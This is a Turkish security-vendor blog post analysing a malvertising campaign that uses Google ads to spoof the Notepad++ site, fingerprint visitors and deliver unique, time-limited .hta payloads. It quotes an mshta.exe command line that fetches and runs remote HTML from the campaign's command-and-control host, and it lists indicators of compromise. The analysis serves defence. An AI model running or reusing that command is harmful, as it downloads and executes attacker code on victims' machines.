Gelişmiş bir tehdit aktörü, aylardır gözden kaçarken kurbanlara özel kötü amaçlı yazılım yükleri sunmak için Google reklamlarını kullanıyor.
Son haftalarda, Google aramaları aracılığıyla kötü amaçlı reklamcılık kampanyalarında bir artış olduğunu fark ettik. Takip ettiğimiz tehdit aktörlerinin birçoğu, teslimat zinciri boyunca tespit edilmekten kaçınmak için tekniklerini geliştirdi.
Bu evrimin, kötü amaçlı reklamlar yoluyla riske giren ve sonunda kötü amaçlı yazılım ve fidye yazılımlarının yayılmasına yol açan kurumsal kullanıcılar arasında gerçek bir dünya etkisi yaratacağına inanıyoruz.
Bu blog yazısında, en az birkaç aydır gözden kaçmış gibi görünen bir kötü amaçlı reklamcılık kampanyasına bakıyoruz. Kullanıcıların parmak izini alma ve zamana duyarlı yükleri dağıtma konusunda benzersizdir.
Notepad++ için kötü amaçlı reklamlar
Tehdit aktörü, Windows için popüler bir metin düzenleyici olan Notepad++’ın yanı sıra PDF dönüştürücüler gibi benzer yazılım programlarını hedef alan bir kampanya yürütüyor. Aşağıdaki resim, yakın zamanda gözlemlediğimiz, tümü aynı tehdit aktörü tarafından ancak farklı reklam hesapları aracılığıyla çalıştırılan, muhtemelen ele geçirilmiş kötü amaçlı reklamların bir kolajıdır.
Kullanıcı bu reklamlardan birini tıkladığında ilk düzeyde filtreleme gerçekleşir. Bu muhtemelen VPN’leri ve orijinal olmayan diğer IP adreslerini göz ardı eden ve bunun yerine sahte bir site gösteren bir IP kontrolüdür:
Ancak amaçlanan hedefler, notepadxtreme’de barındırılan gerçek Notepad++ web sitesinin bir kopyasını görecektir.[.]com:
VM tespiti için parmak izi
Kullanıcı, JavaScript kodunun sistem parmak izini gerçekleştirdiği indirme bağlantısını tıkladığında ikinci düzeyde bir filtreleme gerçekleşir. Daha önce bazı kötü amaçlı reklam kampanyalarının emülatörlerin veya sanal makinelerin varlığını kontrol ettiğini gözlemlemiştik ve kullanılan kod farklı ve daha karmaşık olmasına rağmen burada da olan şey budur.
Kontrollerden herhangi biri eşleşmezse kullanıcı meşru Notepad++ web sitesine yönlendirilir. Her potansiyel kurbana, yükü indirmelerine olanak sağlayacak benzersiz bir kimlik atanır.
Özel, zamana duyarlı indirme
Bu kampanyayı diğerlerinden ayıran bir diğer şey de yükün indirilme şeklidir. Her kullanıcıya aşağıdaki formatta benzersiz bir kimlik verilir:
CukS1=[10 character string][13 digits]
Bu muhtemelen izleme amaçlıdır, ancak aynı zamanda her indirmeyi benzersiz ve zamana duyarlı hale getirmek içindir.
Diğer kötü amaçlı reklamcılık kampanyalarından farklı olarak yük, .hta senaryo. Yukarıda indirme URL’sinde görülen adlandırma kuralının aynısını izler:
Notepad_Ver_[10 character string][13 digits].hta
Dosyayı aynı URL’den tekrar indirmeye çalışmak hatayla sonuçlanır:
.HTA Yükü
Araştırmamız sırasında yakaladığımız .hta dosyası tam olarak silaha dönüştürülmemişti. Ancak Temmuz ayı başlarında VirusTotal’a yüklenen başka bir tane bulmayı başardık. Aynı adlandırma kuralını kullanıyor ve yemin Notepad++ yerine “PDF Converter” olduğunu görebiliyoruz.
Komut dosyası iyi bir şekilde gizlenmiş ve VirusTotal’da 0 algılama gösteriyor. Ancak dinamik analiz sonucunda uzak bir etki alanına (mybigeye) bağlantı vardır.[.]icu) özel bir bağlantı noktasında:
C:\Windows\SysWOW64\mshta.exe "C:\Windows\System32\mshta.exe"
https://mybigeye .icu:52054/LXGZlAJgmvCaQfer/rWABCTDEqFVGdHIQ.html?client_id=jurmvozdcf1687983013426#he7HAp1X4cgqv5SJykr3lRtaxijL0WPB6sdGnZC9IouwDKf8OEMQTFNbmYzU2V+/=
Ayrıca, uzak bağlantıyı kurarken dosya adında saklanan aynı client_id’yi kullandığını da fark ettik.
Bundan sonra ne olacağını bilmesek de bunun, tehdit aktörlerinin Cobalt Strike gibi araçları kullanarak kurbanların makinelerine erişim sağlamak için kullandıkları kötü amaçlı altyapının bir parçası olduğuna inanıyoruz.
Yenilik, kötü amaçlı reklamcılığı daha büyük bir tehdit haline getiriyor
Geçtiğimiz birkaç ay içinde kötü amaçlı reklam kampanyalarının hacminde ve aynı zamanda karmaşıklığında da bir artış gözlemledik. Tehdit aktörleri, reklam doğrulama kontrollerini atlayan ve belirli kurban türlerini hedeflemelerine olanak tanıyan kaçınma tekniklerini başarıyla uyguluyor.
Ellerinde güvenilir bir kötü amaçlı yazılım dağıtım zinciri varken kötü niyetli aktörler, sahte sayfalarını iyileştirmeye odaklanabilir ve özel kötü amaçlı yazılım yükleri oluşturabilir. Bu, bazı yenilikler gördüğümüz ve güvenlik satıcılarının şu anda geride kaldığı başka bir alandır.
Tehdit istihbaratı, kullanıcıları korumak amacıyla tehdit ortamını daha iyi anlamaya yönelik savunma stratejisinin kritik bir parçasıdır. Örneğin, kötü amaçlı reklamları takip etmek, tehdit aktörleri tarafından kullanılan altyapıyı hızlı bir şekilde tespit etmemize ve anında engellememize olanak tanır. Kötü amaçlı yazılım dağıtım zincirini takip etmek, bize mevcut güvenlik ürünlerini atlayabilecek yeni teknikleri gösterir ve tespitlerimizi buna göre ayarlamamıza yardımcı olur.
Uzlaşma Göstergeleri
Reklam alanları:
switcodes[.]com
karelisweb[.]com
jquerywins[.]com
mojenyc[.]com
Sahte Notepad++ sitesi:
notepadxtreme[.]com
Senaryo C2:
mybigeye[.]icu
Malwarebytes EDR ve MDR, fidye yazılımının tüm kalıntılarını kaldırır ve yeniden virüse yakalanmanızı önler. İşletmenizi korumaya nasıl yardımcı olabileceğimiz hakkında daha fazla bilgi edinmek ister misiniz? Aşağıdan ücretsiz deneme sürümünü edinin.
ŞİMDİ DENE